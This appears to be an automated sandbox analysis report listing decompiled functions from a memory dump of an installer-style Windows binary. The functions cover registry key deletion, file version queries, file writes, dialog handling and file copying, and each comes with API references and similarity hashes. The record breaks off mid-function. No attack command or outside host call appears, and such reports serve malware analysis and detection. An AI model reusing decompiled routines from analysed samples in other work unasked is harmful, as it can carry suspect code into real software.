Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040149D, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040149D(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x47eb90 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E0040149D(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406328(2);
					if(_t27 == 0) {
						if( *0x47eb90 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x47eb90, 0);
				}
				return _t18;
			}

0x004014bf
0x004014c7
0x004014ef
0x004014d9
0x00401529
0x0040152f
0x00000000
0x00401531
0x004014ed
0x00000000
0x00000000
0x004014ed
0x00401504
0x0040150c
0x00401513
0x0040153f
0x00000000
0x00000000
0x00401547
0x0040154f
0x00000000
0x00000000
0x00000000
0x0040154f
0x00000000
0x00401522
0x00401536

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Uniqueness

Uniqueness Score: -1.00%

Function 004022FD, Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004022FD(int __ebx, short* __edi, short* __esi) {
				short* _t18;
				long _t19;
				void* _t22;
				void* _t36;
				void* _t41;

				_t18 = E0040145C(_t36, 0xffffffee);
				 *(_t41 - 0x44) = _t18;
				_t19 = GetFileVersionInfoSizeW(_t18, _t41 - 0x14);
				 *__esi = 0;
				 *(_t41 - 0x10) = _t19;
				 *__edi = 0;
				 *((intOrPtr*)(_t41 - 4)) = 1;
				if(_t19 != __ebx) {
					_t22 = GlobalAlloc(0x40, _t19);
					 *(_t41 + 8) = _t22;
					if(_t22 != __ebx) {
						if(GetFileVersionInfoW( *(_t41 - 0x44), __ebx,  *(_t41 - 0x10), _t22) != 0 && VerQueryValueW( *(_t41 + 8), "\\", _t41 - 8, _t41 - 0x44) != 0) {
							E00405F7D(__esi,  *((intOrPtr*)( *(_t41 - 8) + 8)));
							E00405F7D(__edi,  *((intOrPtr*)( *(_t41 - 8) + 0xc)));
							 *((intOrPtr*)(_t41 - 4)) = __ebx;
						}
						_push( *(_t41 + 8));
						GlobalFree();
					}
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}

0x004022ff
0x00402309
0x0040230c
0x00402313
0x00402316
0x00402319
0x0040231c
0x00402325
0x0040232e
0x00402334
0x00402339
0x0040234e
0x00402370
0x0040237c
0x00402381
0x00402381
0x00402384
0x00402387
0x00402387
0x00402339
0x004030e6
0x004030f2

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32 ref: 00402387

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 09adee9a7fbd053c66f6ea055812e8264a43fb00ffa09651659296c7d5f811df
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 09adee9a7fbd053c66f6ea055812e8264a43fb00ffa09651659296c7d5f811df
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00402B23, Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402B23(int __ebx, intOrPtr* __esi) {
				long _t14;
				struct _OVERLAPPED* _t20;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;

				_t26 = __esi;
				_t20 = __ebx;
				 *(_t28 + 8) = GlobalAlloc(0x40, 0x2004);
				if( *((intOrPtr*)(_t28 - 0x24)) == __ebx) {
					E0040145C(_t23, 0x11);
					WideCharToMultiByte(__ebx, __ebx, 0x4100f0, 0xffffffff,  *(_t28 + 8), 0x2004, __ebx, __ebx);
					_t14 = lstrlenA( *(_t28 + 8));
				} else {
					__ecx = 0;
					__ecx = 1;
					E00401446(1);
					__ecx =  *((intOrPtr*)(__ebp + 8));
					 *__ecx = __al;
				}
				if( *_t26 == _t20 || WriteFile(E00405F96(_t28 - 0x44, _t26),  *(_t28 + 8), _t14, _t28 - 0x44, _t20) == 0) {
					 *((intOrPtr*)(_t28 - 4)) = 1;
				}
				_push( *(_t28 + 8));
				GlobalFree();
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00402b23
0x00402b23
0x00402b31
0x00402b37
0x00402b4d
0x00402b61
0x00402b6a
0x00402b39
0x00402b39
0x00402b3b
0x00402b3c
0x00402b41
0x00402b44
0x00402b48
0x00402b73
0x00402b93
0x00402b93
0x00402384
0x00402387
0x004030e6
0x004030f2

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: a1ad23d739ae2dc0793d764d80aab90a75114cdc83cc8f665d811f0770ee815a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: a1ad23d739ae2dc0793d764d80aab90a75114cdc83cc8f665d811f0770ee815a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040209F, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040209F(int __ecx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				void* _t24;
				struct HWND__* _t26;
				void* _t28;

				_t26 = GetDlgItem( *(_t28 - 0xc), __ecx);
				GetClientRect(_t26, _t28 - 0x50);
				_t17 = SendMessageW(_t26, 0x172, _t21, LoadImageW(_t21, E0040145C(_t24, _t21), _t21,  *(_t28 - 0x48) *  *(_t28 - 0x24),  *(_t28 - 0x44) *  *(_t28 - 0x24), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x004020a9
0x004020b0
0x004020df
0x004020e7
0x004020ee
0x004020ee
0x004030e6
0x004030f2

APIs

GetDlgItem.USER32 ref: 004020A3
GetClientRect.USER32 ref: 004020B0
LoadImageW.USER32 ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: daf68ee04513973ea2ab25070624a4c9a3051c83b273c22ae938d1fce644ac54
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: daf68ee04513973ea2ab25070624a4c9a3051c83b273c22ae938d1fce644ac54
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Uniqueness

Uniqueness Score: -1.00%

Function 00401F80, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401F80(int __ebx) {
				int _t25;
				signed int _t27;
				signed int _t28;
				long _t32;
				struct HWND__* _t36;
				int _t37;
				signed int _t38;
				int _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				int _t54;
				void* _t55;
				struct HWND__* _t59;
				void* _t62;

				_t43 = __ebx;
				_t45 = 3;
				_t25 = E00401446(_t45);
				_t46 = 4;
				 *(_t62 - 0x34) = _t25;
				 *(_t62 + 8) = E00401446(_t46);
				if(( *(_t62 - 0x18) & 0x00000001) != 0) {
					 *(_t62 - 0x34) = E0040145C(_t55, 0x33);
				}
				if(( *(_t62 - 0x18) & 0x00000002) != 0) {
					 *(_t62 + 8) = E0040145C(_t55, 0x44);
				}
				if( *((intOrPtr*)(_t62 - 0x30)) != 0x21) {
					_t27 = E0040145C(_t55, 1);
					_t28 = E0040145C(_t55, 0x12);
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t32 = FindWindowExW( *(_t62 - 0x34),  *(_t62 + 8),  ~( *_t27 & 0x0000ffff) & _t27,  ~( *_t28 & 0x0000ffff) & _t28);
					goto L9;
				} else {
					_t36 = E00401446(1);
					_t52 = 2;
					_t59 = _t36;
					_t37 = E00401446(_t52);
					_t54 =  *(_t62 - 0x18) >> 2;
					if(_t54 == _t43) {
						_t32 = SendMessageW(_t59, _t37,  *(_t62 - 0x34),  *(_t62 + 8));
						L9:
						 *(_t62 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutW(_t59, _t37,  *(_t62 - 0x34),  *(_t62 + 8), _t43, _t54, _t62 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t62 - 4)) =  ~_t38 + 1;
					}
				}
				if( *((intOrPtr*)(_t62 - 0x2c)) >= _t43) {
					_push( *(_t62 - 8));
					E00405F7D();
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t62 - 4));
				return 0;
			}

0x00401f80
0x00401f82
0x00401f83
0x00401f8a
0x00401f8b
0x00401f97
0x00401f9a
0x00401fa3
0x00401fa3
0x00401faa
0x00401fb3
0x00401fb3
0x00401fba
0x00402008
0x00402011
0x0040201b
0x00402025
0x00402030
0x00000000
0x00401fbc
0x00401fbf
0x00401fc6
0x00401fc7
0x00401fc9
0x00401fd1
0x00401fd6
0x00401ffe
0x00402036
0x00402036
0x00401fd8
0x00401fe6
0x00401fee
0x00401ff1
0x00401ff1
0x00401fd6
0x0040203c
0x00402042
0x004030de
0x004030de
0x004030e6
0x004030f2

APIs

SendMessageTimeoutW.USER32 ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Uniqueness

Uniqueness Score: -1.00%

Function 004043D9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E004043D9(unsigned int __eax, int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v72;
				char _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t43;
				unsigned int _t47;

				_t47 = __eax;
				_push(0x14);
				_pop(0);
				_v8 = 0xffffffdc;
				if(__eax < 0x100000) {
					_push(0xa);
					_pop(0);
					_v8 = 0xffffffdd;
				}
				if(_t47 < 0x400) {
					_v8 = 0xffffffde;
				}
				if(_t47 < 0xffff3333) {
					_t43 = 0x14;
					asm("cdq");
					_t47 = _t47 + 1 / _t43;
				}
				E00406831(0, _t47, 0x451d98, 0x451d98, _a8);
				_push(E00406831(0, _t47, 0x451d98,  &_v72, 0xffffffdf));
				_push(E00406831(0, _t47, 0x451d98,  &_v136, _v8));
				_t40 = 0xa;
				_push(((_t47 & 0x00ffffff) * 0xa >> 0) % _t40);
				_push(_t47 >> 0);
				wsprintfW( &(0x451d98[lstrlenW(0x451d98)]), L"%u.%u%s%s");
				return SetDlgItemTextW( *0x476a68, _a4, 0x451d98);
			}

0x004043e5
0x004043e7
0x004043e9
0x004043ea
0x004043f7
0x004043f9
0x004043fb
0x004043fc
0x004043fc
0x00404409
0x0040440d
0x0040440d
0x0040441a
0x00404425
0x00404426
0x00404429
0x00404429
0x00404434
0x00404444
0x00404454
0x00404465
0x0040446e
0x0040446f
0x00404483
0x0040449f

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32 ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Uniqueness

Uniqueness Score: -1.00%

Function 004027E3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004027E3(void* __ebx, intOrPtr __ecx) {
				short* _t13;
				void* _t20;
				void* _t26;
				void* _t30;

				_t20 = __ebx;
				 *((intOrPtr*)(_t30 + 8)) = E004061EC(__ecx);
				if( *(_t30 - 0x1c) != __ebx) {
					_t13 = E0040145C(_t26, 0x22);
					_t28 = _t13;
					_push(_t13);
					E004062CF(L"DeleteRegKey: \"%s\\%s\"",  *((intOrPtr*)(_t30 + 8)));
					_t15 =  *((intOrPtr*)(_t30 - 0x28));
					if( *((intOrPtr*)(_t30 - 0x28)) == __ebx) {
						_t15 =  *0x47eb64 + 0x80000001;
					}
					 *((intOrPtr*)(_t30 - 0x14)) = E0040149D(_t15, _t28,  *(_t30 - 0x1c) & 0x00000002);
					goto L7;
				} else {
					__edi = E00401553(2);
					if(__edi == __ebx) {
						L1:
						 *((intOrPtr*)(_t30 - 4)) = 1;
					} else {
						__esi = E0040145C(__edx, 0x33);
						__eax = RegDeleteValueW(__edi, __esi);
						_push(__esi);
						_push(0x4140f8);
						 *(__ebp - 0x14) = __eax;
						E004062CF(L"DeleteRegValue: \"%s\\%s\" \"%s\"",  *((intOrPtr*)(__ebp + 8))) = RegCloseKey(__edi);
						L7:
						if( *((intOrPtr*)(_t30 - 0x14)) != _t20) {
							goto L1;
						}
					}
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004027e3
0x004027ea
0x004027f0
0x00402838
0x0040283d
0x0040283f
0x00402848
0x0040284d
0x00402855
0x0040285c
0x0040285c
0x0040286f
0x00000000
0x004027f2
0x004027f9
0x004027fd
0x00401a13
0x00401a13
0x00402803
0x0040280a
0x0040280e
0x00402814
0x00402815
0x0040281d
0x0040282e
0x00402872
0x00402875
0x00000000
0x0040287b
0x00402875
0x004027fd
0x004030e6
0x004030f2

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 299377076c6de55c6c8bcc350db14ab4252c3145c8454967ea9a3e37967a7ee4
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 299377076c6de55c6c8bcc350db14ab4252c3145c8454967ea9a3e37967a7ee4
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00402665, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00402665() {
				intOrPtr _t22;
				WCHAR* _t35;
				void* _t40;
				WCHAR* _t41;
				WCHAR* _t43;
				void* _t45;

				_t43 = E0040145C(_t40, _t35);
				_t41 = E0040145C(_t40, 0x11);
				_t22 = E0040145C(_t40, 0x23);
				_push(_t41);
				 *((intOrPtr*)(_t45 + 8)) = _t22;
				E004062CF(L"CopyFiles \"%s\"->\"%s\"", _t43);
				if(E00406301(_t43) != 0) {
					 *(_t45 - 0x5c) =  *(_t45 - 0xc);
					 *((intOrPtr*)(_t45 - 0x58)) = 2;
					 *((short*)(_t43 + 2 + lstrlenW(_t43) * 2)) = 0;
					 *((short*)(_t41 + 2 + lstrlenW(_t41) * 2)) = 0;
					_t28 =  *((intOrPtr*)(_t45 + 8));
					 *(_t45 - 0x54) = _t43;
					 *(_t45 - 0x50) = _t41;
					 *((intOrPtr*)(_t45 - 0x42)) =  *((intOrPtr*)(_t45 + 8));
					 *((short*)(_t45 - 0x4c)) =  *((intOrPtr*)(_t45 - 0x24));
					E00404F9E(_t35, _t28);
					if(SHFileOperationW(_t45 - 0x5c) != 0) {
						goto L2;
					}
				} else {
					L2:
					E00404F9E(0xfffffff9, _t35);
					 *((intOrPtr*)(_t45 - 4)) = 1;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t45 - 4));
				return 0;
			}

0x0040266d
0x00402676
0x00402678
0x0040267d
0x00402684
0x00402687
0x00402697
0x004026aa
0x004026ad
0x004026bc
0x004026c8
0x004026cd
0x004026d6
0x004026d9
0x004026dc
0x004026df
0x004026e3
0x004026f4
0x00000000
0x004026fa
0x00402699
0x00402699
0x0040269c
0x00401a13
0x00401a13
0x004030e6
0x004030f2

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNELBASE(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Uniqueness

Uniqueness Score: -1.00%

Function 00406250, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00406250(void* __ecx, WCHAR* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				WCHAR* _v8;
				intOrPtr _v12;
				int _t22;
				void* _t31;
				signed int _t34;
				int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t44;

				_v8 = _a4;
				_t34 = 3;
				_t22 = _a8 / _t34;
				_t42 = 0;
				_v12 = 0;
				_t38 = _t22;
				if(_a16 <= _t38) {
					_t39 = _a16;
				} else {
					_t39 = _t38 - 1;
					_v12 = 1;
				}
				if(_t39 > _t42) {
					_t31 = _t39 - 1;
					do {
						asm("sbb eax, eax");
						_t22 = wsprintfW(_v8, L"%02x%c",  *(_t42 + _a12) & 0x000000ff,  ~(_t42 - _t31) & 0x00000020);
						_v8 =  &(_v8[3]);
						_t44 = _t44 + 0x10;
						_t42 = _t42 + 1;
					} while (_t42 < _t39);
				}
				if(_v12 != 0) {
					return lstrcatW(_a4, L"...");
				}
				return _t22;
			}

0x0040625a
0x00406264
0x00406265
0x00406267
0x00406269
0x0040626c
0x00406271
0x0040627d
0x00406273
0x00406273
0x00406274
0x00406274
0x00406282
0x00406285
0x00406288
0x0040628e
0x004062a4
0x004062aa
0x004062ae
0x004062b1
0x004062b2
0x004062b6
0x004062bd
0x00000000
0x004062c7
0x004062ce

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

..., xrefs: 004062BF
%02x%c, xrefs: 0040629C

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Uniqueness

Uniqueness Score: -1.00%

Function 00402713, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402713(WCHAR* __ebx) {
				int _t16;
				WCHAR* _t23;
				WCHAR* _t24;
				void* _t26;
				void* _t31;
				int _t37;

				_t23 = __ebx;
				 *(_t31 - 0x10) = __ebx;
				 *(_t31 - 0x14) = __ebx;
				 *(_t31 + 8) = __ebx;
				E00406035(0x4100f0, L"<RM>");
				_t16 = E00406035(0x4140f8, 0x4100f0);
				if( *((intOrPtr*)(_t31 - 0x2c)) != __ebx) {
